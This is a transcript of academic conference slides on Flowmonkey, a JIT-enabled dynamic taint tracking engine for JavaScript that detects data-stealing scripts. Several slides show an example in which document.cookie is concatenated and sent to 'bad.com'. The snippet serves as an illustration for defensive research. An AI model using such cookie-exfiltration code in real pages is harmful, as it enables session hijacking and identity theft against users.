1 / 37

Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript

Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript. Don Jang UC San Diego. ✗. Identity Theft. Cookie Stealing. document.cookie. Password. Credit card #. Browsing history. Epidemic of Data Stealing JavaScript!. How to Detect Data Stealing?.

phoebe
Download Presentation

Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Flowmonkey: A Fast Dynamic Taint Tracking Engine for JavaScript Don Jang UC San Diego

  2. • Identity Theft • Cookie Stealing • document.cookie

  3. Password • Credit card # • Browsing history

  4. Epidemic of Data Stealing JavaScript!

  5. How to Detect Data Stealing? • Without Sacrificing Performance?

  6. Motivation Dynamic Taint Tracking Flowmonkey Future Work&Conclusion

  7. Dynamic Taint Tracking • Tracks where a value goes at runtime

  8. Dynamic Taint Tracking • 1. Tag a value with a taint • 2. Propagate taints with the value • 3. Block taints from untrusted sinks

  9. Example:Cookie Stealing • ck = document.cookie • data = tmp + ck; • send(“bad.com”, data);

  10. Example:Cookie Stealing • ck = document.cookie • data = tmp + ck; • send(“bad.com”, data ); document.cookie; • Inject Taints • (At confidential sources)

  11. Example:Cookie Stealing • ck = document.cookie; • data = tmp + ck; • send(“bad.com”, data ); ck tmp + ck; data data • Propagate Taints • (At assignments, etc)

  12. Example:Cookie Stealing • ck = document.cookie; • data = tmp + ck; • send(“bad.com”, data ); “cr=” + color • send(“bad.com”, data ); • Block Taints • (At untrusted sinks)

  13. Dynamic Taint Tracking:Policies ✗ ✗ ✗ • Cookie Protection • cookie send() • Password Protection • password send() • General Policy • secret info expression

  14. Dynamic Taint Tracking:JS • Cross site scripting prevention with dynamic data tainting and static analysis, NDSS'07 • 10~100x slowdown • Analyzing information flow in JavaScript-based browser extensions, ACSAC'09 • An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications, CCS'10

  15. Goal: Make It Fast

  16. Motivation Dynamic Taint Tracking Flowmonkey Future Work&Conclusion

  17. Source code Interpreter JIT Engine M Modification • Based on Jaegermonkey • Taint tracking logic is augmented

  18. Language Extensions • __taint(val, t) • val: a value to be tainted • t : a taint to be used

  19. Language Extensions • __taintof(val) • returns the taint ofval

  20. Language Extensions • var secret = __taint(34349, 1); • tmp = secret * 68; • tmp2 = tmp + “345”; • tmp3 = parseInt(tmp2); • alert(__taintof(tmp)); // 1 is printed

  21. Implementation: Shadow Stack s * 6 push s //s=5 push 6 mul 6 6’s taint 5 30 s’ taint Joined taint • Shadow Stack • Real Stack

  22. Implementation: Shadow Property a.fld = secret fld … • Real Properties a fld‘s taint … • Shadow Properties

  23. Hybrid Approach Full-fledged Taint Tracking Interpreter Taint Detecting JIT Engine

  24. Hybrid Approach Full-fledged Taint Tracking Interpreter Taint Detecting JIT Engine • If it doesn’t touch a taint

  25. Hybrid Approach • Taint detected!! Full-fledged Taint Tracking Interpreter Taint Detecting JIT Engine • Do full-fledged • taint tracking

  26. Hybrid Approach • Rapid prototyping • Fast with few taints • Slow with many taints

  27. Performance: Baseline • Sunspider • cookie doesn’t flow to 3rd party code

  28. Performance: Cookie Tracking • Sunspider • cookie doesn’t flow to 3rd party code

  29. Demo

  30. Motivation Dynamic Taint Tracking Flowmonkey Future Work&Conclusion

  31. Future Work Missing Flows Implicit Flows, Timing Channel, etc Empirical Study To prove the usability of taint tracking

  32. Conclusions A Fast Hybrid Taint Tracking Engine First JIT-enabled taint tracking engine Still Many Missing Parts Possible to make it a protection tool? Can we sacrifice some performance?

  33. Resources http://firebird.ucsd.edu/flowmonkey

  34. Thank you!

More Related